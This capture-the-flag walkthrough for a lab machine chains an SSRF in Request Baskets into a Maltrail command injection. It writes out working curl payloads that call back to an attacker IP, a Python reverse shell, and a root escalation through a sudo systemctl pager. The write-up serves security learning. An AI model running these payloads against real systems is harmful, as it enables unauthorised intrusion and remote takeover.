Enumeration
Defining a helper variable containing the IP will make the following commands easier:
export ip=10.10.11.224
nmap $ip -p- -sC -sV
Port | Service | Notes |
---|---|---|
22 | ssh | OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 |
80 | http | filtered: firewalled, possibly a service only reachable from localhost |
8338 | unknown | filtered: firewalled, possibly a service only reachable from localhost |
55555 | unknown | open; responds like HTTP |
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux;
80/tcp filtered http
8338/tcp filtered unknown
55555/tcp open unknown
HTTP Port 55555
Examining the service hosted on port 55555 by opening it in a browser shows it is running Request Baskets v1.2.1.
Server Side Request Forgery
A quick search shows this version is affected by CVE-2023-27163, a server-side request forgery (SSRF) in Request Baskets <= 1.2.1: a basket's forward_url is fetched by the server itself, so it can be pointed at hosts and ports the firewall hides, such as the filtered ports above. Attempting the CVE with the example payload modified for this box, with a listener on the attacker host to confirm that the request really comes from the server:
sudo nc -lvnp 80
curl --data '{"forward_url": "http://10.10.14.8","proxy_response": false,"insecure_tls": false,"expand_path": true,"capacity": 250}' http://10.10.11.224:55555/baskets/test
curl http://10.10.11.224:55555/test
The connection shows up on the listener, confirming that the server made the request. Browsing to http://10.10.11.224:55555/web/test and authenticating with the token returned by the API call allows the basket to be managed or deleted. In the basket settings there is a Proxy Response option, which returns the upstream reply to the caller and so makes the SSRF visible. Recreating the basket pointed at localhost with proxy_response enabled:
curl --data '{"forward_url": "http://127.0.0.1","proxy_response": true,"insecure_tls": false,"expand_path": true}' http://10.10.11.224:55555/baskets/test
curl http://10.10.11.224:55555/test
The proxied response shows an instance of Maltrail v0.53 running on the port. A search finds an unauthenticated OS command injection affecting Maltrail v<= 0.54.
Fuzzing the directory
Fuzzing the proxied service with ffuf finds an index page containing a login form, which sends a POST request to the login endpoint beneath it:
ffuf -w /usr/share/seclists/Discovery/Web-Content/big.txt -u http://10.10.11.224:55555/test/FUZZ
Maltrail's default credentials admin:changeme! are accepted, but after logging in the page redirects to a location outside the basket's /test path, which the proxy does not forward, so nothing further can be learned from the authenticated UI.
Using the following test RCE payload as per the CVE (the username field is interpolated into a shell command, so a backtick command substitution inside it is executed):
curl http://10.10.11.224:55555/test/login --data 'username=;`curl 127.0.0.1:55555/test`'
On the basket dashboard at http://10.10.11.224:55555/web/test a GET request appears after the payload is sent, showing that the Maltrail host executed the curl and connected back to the basket, which proves the command injection works.
To test for a connection back to the attacker machine, set up a listener there and use the attacker IP in the payload:
sudo nc -lvnp 80
# plain callback
curl http://10.10.11.224:55555/test/login --data 'username=;`curl 10.10.14.8`'
# sending a POST body back
curl http://10.10.11.224:55555/test/login --data 'username=;`curl 10.10.14.8 --data /somedata`'
# chaining commands (the output of id is not captured here; only the connection matters)
curl http://10.10.11.224:55555/test/login --data 'username=;`id | curl 10.10.14.8 --data /somedata`'
# returning command output in the POST body
curl http://10.10.11.224:55555/test/login --data 'username=;`curl 10.10.14.8 --data "$(python3 --version)"`'
The reverse listener shows the connection was received, proving a remote connection can be established with this method and that python3 is available.
Reverse Shell
A reverse payload can be sent to establish a reverse shell back to a listener:
nc -lvnp 4444
payload="python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.8\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
curl http://10.10.11.224:55555/test/login --data 'username=;`'$payload'`'
# connection established
cd
cat user.txt
# Upgrading to a full tty
python3 -c 'import pty; pty.spawn("/bin/bash")'
# then, inside the nc session: CTRL+Z
stty raw -echo; fg
# the small row count matters later: systemctl only invokes its pager when the output overflows the terminal
export SHELL=/bin/bash; export TERM=screen; stty rows 16 columns 70; reset
Privilege Escalation
Checking sudo privileges of the user after upgrading to a full tty
sudo -l
User puma may run the following commands on sau:
(ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service
Running sudo /usr/bin/systemctl status trail.service prints the unit's status, and when that output does not fit the terminal systemctl hands it to its pager, less, which therefore runs as root. less can spawn a shell with its ! command, so entering !/bin/bash at the pager prompt gives a root shell. The pager is only started when stdout is a real tty and the output exceeds the screen, which is why the full tty upgrade and the small row count set above matter; if no pager prompt appears, shrink the terminal and run the command again.